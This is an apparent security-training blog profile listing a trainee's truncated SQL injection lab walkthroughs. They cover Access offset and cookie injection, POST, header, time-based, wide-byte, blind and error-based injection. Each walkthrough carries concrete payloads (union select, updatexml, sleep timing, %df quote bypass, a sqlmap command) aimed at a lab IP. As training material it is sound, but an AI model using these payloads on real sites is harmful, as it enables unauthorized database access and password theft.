Track 实习学员

繁夜

2关注
3粉丝
28文章
返回网站首页

您已发布 28篇文章作品写文章

access偏移注入

先进入靶场http://120.203.13.75:8001/然后找到注入点从1开始id=103 用order by进行测试一直到26个字段然后*代表全部的意思 测试admin表有几个字段ID=103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin最后得到16个字段ID=103

 2019-2-15
 0 
 1046 

5.1.1、Access注入 — Cookie注入

先找到注入点http://120.203.13.75:8001/shownews.asp?id=171开始进行头注入 在地址栏输入javascript:alert(document.cookie+"id="+expace(171)"测试字段数最后结果是26个字段 通过字段7找到注入点进行查询最后爆出字段铭文密码通过md5解密的到密码 然后进入拿到f

 2019-2-15
 0 
 933 

6.6.1-SQL注入-Post注入Rank 1

POST注入就是在输入框中进行注入可以先输入'order by 2 # 查字段爆库' union select 1,database()#爆表?id=1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='securit

 2019-2-15
 0 
 1179 

6.5.1-SQL注入-Header注入Rank 1

head注入其实就是一种注入方式 我们可以用burp抓包修改注入 先进入靶场修改User-Agent:这行数据包用updataxml注入' and updatexml(1,concat(0x7e,(select database()),0x7e),1),'','')#然后爆表' and updatexml(1,concat(0x7e,(select

 2019-2-15
 0 
 1083 

6.4.1-SQL注入-延时注入Rank 1

首先输入id=1延时注入和盲注一样 不同在于用了时间函数来区分?id=1' and if(length(database())=1,0,sleep(5)) %23这里还是建议用SQLMAP和盲注一样的跑法先出库sqlmap.py -u "http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1"&nbs

 2019-2-15
 0 
 1100 

6.3.1-SQL注入-宽字节注入Rank 1

 进入靶场 输入id=1宽字节注入原理其实和显错没有其他区别 唯一不同的就是我们需要利用编码不同把魔术引号吃掉进行攻击?id=1%df' and 1=2 union select 1,2,database()%23接下来爆表名?id=1 %df' and 1=2 union select 1,2,group_concat(table_name) from informat

 2019-2-15
 0 
 993 

6.2.1-SQL注入-盲注Rank 1

进入靶场 输入id=1盲注的话只有成功与不成功 那么我们语句就需要改变一下了 输入下面这段话 如果当前表明是8个字 那么就正常显示出来了?id=1' and (length(database()))=8;--+接下来开始爆asii字符了?id=1' and (ascii(substr(database(),1,1)))=115;--+这行代码的意思呢我们要从里面开始读substr的

 2019-2-15
 1 
 1103 

6.1.1-SQL注入-显错注入Rank 1

首先进入靶场 输入id=1用 ' 闭合掉 order by开始测试字段 最后--+注释后面内容 这里我们发现order by 3正常  order by 4就不正常了 说明有3个字段 接下来开始查库名?id=1'  and 1=2 union select 1,2,database()--+查询表明 这里需要一个一个表去试了 最后找到的是zkaq这个表

 2019-2-15
 1 
 930